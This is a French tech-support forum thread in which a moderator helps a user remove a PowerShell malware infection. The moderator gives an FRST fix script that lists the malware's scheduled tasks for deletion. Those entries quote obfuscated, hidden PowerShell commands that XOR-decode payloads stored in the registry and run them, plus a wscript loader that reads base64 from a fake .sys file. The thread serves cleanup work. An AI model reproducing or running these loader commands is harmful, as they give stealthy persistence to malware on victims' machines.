Virus Powershell

Résolu/Fermé
antoinepops Messages postés 5 Date d'inscription lundi 24 juillet 2023 Statut Membre Dernière intervention 24 juillet 2023 - Modifié le 24 juil. 2023 à 17:15
bazfile Messages postés 56741 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 28 décembre 2024 - 24 juil. 2023 à 18:16

Bonjour à tous,

Je viens solliciter votre car je pense être infecté par le virus Powershell.

J'ai réalisé l'analyse avec FRST et voici les 2 fichiers générés :

https://pjjoint.malekal.com/files.php?id=20230724_j14g8q14r12i8 

https://pjjoint.malekal.com/files.php?id=20230724_s6x15q7d6m9 

Merci d'avance pour votre aide !

Antoine


Windows / Firefox 115.0

A voir également:

5 réponses

bazfile Messages postés 56741 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 28 décembre 2024 19 348
24 juil. 2023 à 17:15

Bonjour.

Les liens des rapports ne sont pas accessibles met-les sur https://security-x.fr/up/ et donne les liens générés.


0
antoinepops Messages postés 5 Date d'inscription lundi 24 juillet 2023 Statut Membre Dernière intervention 24 juillet 2023
Modifié le 24 juil. 2023 à 17:25
0
bazfile Messages postés 56741 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 28 décembre 2024 19 348
24 juil. 2023 à 17:28

Tu n'as pas compris, tu m'as renvoyé les liens de PPjoint, tu dois mettre les rapports sur le site que je t'ai indiqué https://security-x.fr/up/, car le site de PPJOINT est hors service.

1
antoinepops Messages postés 5 Date d'inscription lundi 24 juillet 2023 Statut Membre Dernière intervention 24 juillet 2023 > bazfile Messages postés 56741 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 28 décembre 2024
Modifié le 24 juil. 2023 à 18:06
0
bazfile Messages postés 56741 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 28 décembre 2024 19 348
Modifié le 24 juil. 2023 à 17:57

C'est mieux ;)

Désinstalle WebAdvisor par McAfee c'est un adware.

Procédure à faire dans l'ordre indiqué :

1- Ouvre FRST en tant qu'administrateur pour cela clique avec le bouton droit de ta souris sur FRST et choisis exécuter en tant qu'administrateur
2 - Copie l'intégralité du script qui est dans l'encadré qui suit :

 
Start::
CreateRestorePoint:
CloseProcesses:
GroupPolicy: Restriction ? 
Policies: C:\ProgramData\NTUSER.pol: Restriction
Task: {E379535F-1DD6-4BF2-BAF7-59201392FB0C} - System32\Tasks\Microsoft\Windows\Management\Provisioning\7y7iBX\EF433B13-3F17-4ECD-B1F9-15DAAFBFCFD5 => C:\WINDOWS\system32\cmd.exe [323584 2023-05-09] (Microsoft Windows -> Microsoft Corporation) -> /c EcHo ieX "iCM ([ScripTBlOCK]::CREAtE([STRING]::JoIN('', ((Get-iTeMPropERtY -PatH 'hklM:\sofTWaRE\ODbc7y7IbXr').'7Y7IBXR0D' | % { [ChAR](`$_ -BXoR 185) }))))" | pOweRShEll -WINDoWSTyle HIdden
Task: {C7A93078-5012-41D8-AC0F-29E10D8C571F} - System32\Tasks\Microsoft\Windows\Management\Provisioning\cA0QP1XjF\38A081D2-25A5-44D3-9848-2E07CA2802A6 => C:\WINDOWS\system32\cmd.exe [323584 2023-05-09] (Microsoft Windows -> Microsoft Corporation) -> /C ECHo iex "icm ([SCRipTbLoCk]::cREAtE([StrING]::JoIn('', ((GEt-iteMPROpeRtY -Path 'HKlM:\sofTwarE\mCafEecA0Qp1').'ca0qP1xj' | % { [cHaR](`$_ -Bxor 96) }))))" | pOweRshElL -windoWsTYle hIDdEN
Task: {2BA5920B-BC65-4227-AE98-601F09516032} - System32\Tasks\Microsoft\Windows\Management\Provisioning\f3D6t\C55BCE30-63CB-41D5-8F4F-E09E62453C66 => C:\WINDOWS\system32\cmd.exe [323584 2023-05-09] (Microsoft Windows -> Microsoft Corporation) -> /c ecHo Iex "ICm ([scRIpTBloCK]::CREaTe([string]::Join('', ((GeT-ItEmPRoPeRty -Path 'hKlm:\SoFtwARe\sEtUPwYuywf3d6Tu19').'f3d6tu19AO' | % { [chAr](`$_ -bXOR 1) }))))" | POwErShell -WindoWStyLE HidDEN
Task: {0429FF68-A871-4312-A25A-158CD65D469D} - System32\Tasks\Microsoft\Windows\Management\Provisioning\GNsjnZslvx\8853604F-CA95-42B9-932C-4D4B049CC721 => C:\WINDOWS\system32\wscript.exe [200704 2023-05-09] (Microsoft Windows -> Microsoft Corporation) -> /e:vbscript /b "C:\Windows\System32\WNVGNsjnZ\D1375AA4-1E7F-4702-8D2A-672B0D9C6543" "n; $sc = [System.Text.Encoding]::UTF8.GetString([System.IO.File]::ReadAllBytes('C:\Windows\System32\drivers\lvxxbkExF\1F808FF1-623E-4D87-A80A-FC18203EF67C.sys'), 1896616, 422); $sc2 = [Convert]::FromBase64String($sc (l'élément de données a 101 caractères en plus).
Task: {B4FBEB15-EEEE-4B46-BC8D-C1E6B4C62FA1} - System32\Tasks\Microsoft\Windows\Management\Provisioning\K9Atm\2496A4DA-48ED-48EA-86F0-11C73F39F0AD => C:\WINDOWS\system32\cmd.exe [323584 2023-05-09] (Microsoft Windows -> Microsoft Corporation) -> /C eChO iEx "Icm ([SCrIPtBlOcK]::CReAtE([stRING]::JoiN('', ((get-iTeMprOPErTY -PaTh 'Hklm:\softWaRe\nicO MAK comPUtINgK9AtmhMzg').'k9AtMHmZGDX' | % { [ChaR](`$_ -BXor 74) }))))" | pOwERsHEll -wiNdOwstyLE hiDden
Task: {584EF616-AEB2-4EC6-B5B3-BD7423FCB0B4} - System32\Tasks\Microsoft\Windows\Management\Provisioning\KwuYJBzq4\EAA48BF2-CA68-41D0-9736-6A39FE09F99F => C:\WINDOWS\system32\cmd.exe [323584 2023-05-09] (Microsoft Windows -> Microsoft Corporation) -> /C ECHo ieX "Icm ([scRiPTbLocK]::crEATe([STrIng]::JOiN('', ((GeT-ItEMPrOPERTy -PaTH 'HkLM:\SOftware\cliENTskwUyJ').'KWUyJbZ' | % { [char](`$_ -BXoR 54) }))))" | POWERSheLl -WiNDowstYlE HiDdEn
Task: {01D70868-E2C8-4A03-ABD2-317408F11735} - System32\Tasks\Microsoft\Windows\Management\Provisioning\WyuyWeV6p\06B6F0D2-15E2-4712-93BD-8B4391C37F9C => C:\WINDOWS\system32\cmd.exe [323584 2023-05-09] (Microsoft Windows -> Microsoft Corporation) -> /C ECHO IeX "iCM ([sCRiPTBLoCK]::CrEaTe([strINg]::join('', ((GEt-IteMPRopERty -pAtH 'hKLm:\SoFtWare\setuPwyUYW').'wYUyWeV' | % { [cHAr](`$_ -BxoR 52) }))))" | POwErSHEll -wINDoWSTyle HiDdeN
Task: {CCDFC0B8-01A3-4E74-A820-4F13F51D269E} - System32\Tasks\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser => %SystemRoot%\System32\MbaeParserTask.exe (Pas de fichier)
Task: {C6373D38-CA2F-43FA-B4C3-73D1D12966F8} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Reboot_AC => %systemroot%\system32\MusNotification.exe /RunOnAC RebootDialog (Pas de fichier)
Task: {7D737064-C993-4358-A079-4B50B664B538} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Reboot_Battery => %systemroot%\system32\MusNotification.exe /RunOnBattery RebootDialog (Pas de fichier)
Task: {E0F10DCF-44AD-40E8-9370-FB5DA59F93FB} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => %systemroot%\system32\MusNotification.exe (Pas de fichier)
Task: {037E68F7-A80F-4CCB-9520-D9E6A9BD33EF} - \Microsoft\Windows\WindowsUpdate\RUXIM\PLUGScheduler -> Pas de fichier <==== ATTENTION
Task: {BC0A6097-F752-4DF9-A567-0D788B2215D2} - \Microsoft\Windows\Bluetooth\UninstallDeviceTask -> Pas de fichier <==== ATTENTION
Task: {8967D969-B67D-48D8-A591-4B73EE649E3A} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => %ProgramFiles%\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe (Pas de fichier)
Task: {CCDFC0B8-01A3-4E74-A820-4F13F51D269E} - System32\Tasks\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser => %SystemRoot%\System32\MbaeParserTask.exe (Pas de fichier)
Task: {C6373D38-CA2F-43FA-B4C3-73D1D12966F8} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Reboot_AC => %systemroot%\system32\MusNotification.exe /RunOnAC RebootDialog (Pas de fichier)
Task: {7D737064-C993-4358-A079-4B50B664B538} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Reboot_Battery => %systemroot%\system32\MusNotification.exe /RunOnBattery RebootDialog (Pas de fichier)
Task: {E0F10DCF-44AD-40E8-9370-FB5DA59F93FB} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => %systemroot%\system32\MusNotification.exe (Pas de fichier)
Task: {A50561AD-FF2E-4310-A9C0-A51475503533} - System32\Tasks\MSUtilisateur1 => C:\Users\Utilisateur\AppData\Local\NSegw2\NSegw2.exe (Pas de fichier)
Task: {B2E9735D-A7D1-4A7C-B317-3AFDE590FD7D} - System32\Tasks\MSUtilisateur3 => C:\Users\Utilisateur\AppData\Local\NSyas2\NSyas2.exe (Pas de fichier)
S1 WinSetupMon; system32\DRIVERS\WinSetupMon.sys [X]
EmptyTemp:
End::

3- Une fois le script copié clique sur Corriger, FRST prend automatiquement le script qui est dans le presse-papier.
 


Laisse la correction se faire une fois qu'elle est terminée il te sera demandé de redémarrer ton pc, fait-le dès que cela te sera demandé, voir ci-dessous.

Puis une fois ton ordinateur redémarré :
4- Tu auras un fichier Fixlog sur ton bureau ensuite envoie ce rapport fixlog sur https://security-x.fr/up/ puis donne le lien généré par https://security-x.fr/up/ dans ta réponse.

5- VÉRIFIE ET DIS-MOI SI TON PROBLÈME EST TOUJOURS PRÉSENT


0
antoinepops Messages postés 5 Date d'inscription lundi 24 juillet 2023 Statut Membre Dernière intervention 24 juillet 2023
24 juil. 2023 à 18:05

Merci beaucoup de ta réactivité !

Voici le lien du fixlog : https://up.security-x.fr/file.php?h=R247cb6085c5a0e99f00ffd1cc31b2fb3

0
bazfile Messages postés 56741 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 28 décembre 2024 19 348
24 juil. 2023 à 18:10

Le fixlog est OK si de ton côté c'est aussi OK, tu peux désinstaller FRST, renomme le fichier FRST que tu as téléchargé, renomme-le en uninstall, puis une fois le fichier renommé ouvre-le, la désinstallation se fera automatiquement via un redémarrage du pc.

0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
antoinepops Messages postés 5 Date d'inscription lundi 24 juillet 2023 Statut Membre Dernière intervention 24 juillet 2023
24 juil. 2023 à 18:12

Super ! Merci encore une fois.

Bonne soirée.

0
bazfile Messages postés 56741 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 28 décembre 2024 19 348
24 juil. 2023 à 18:16

Bonne soirée également.

0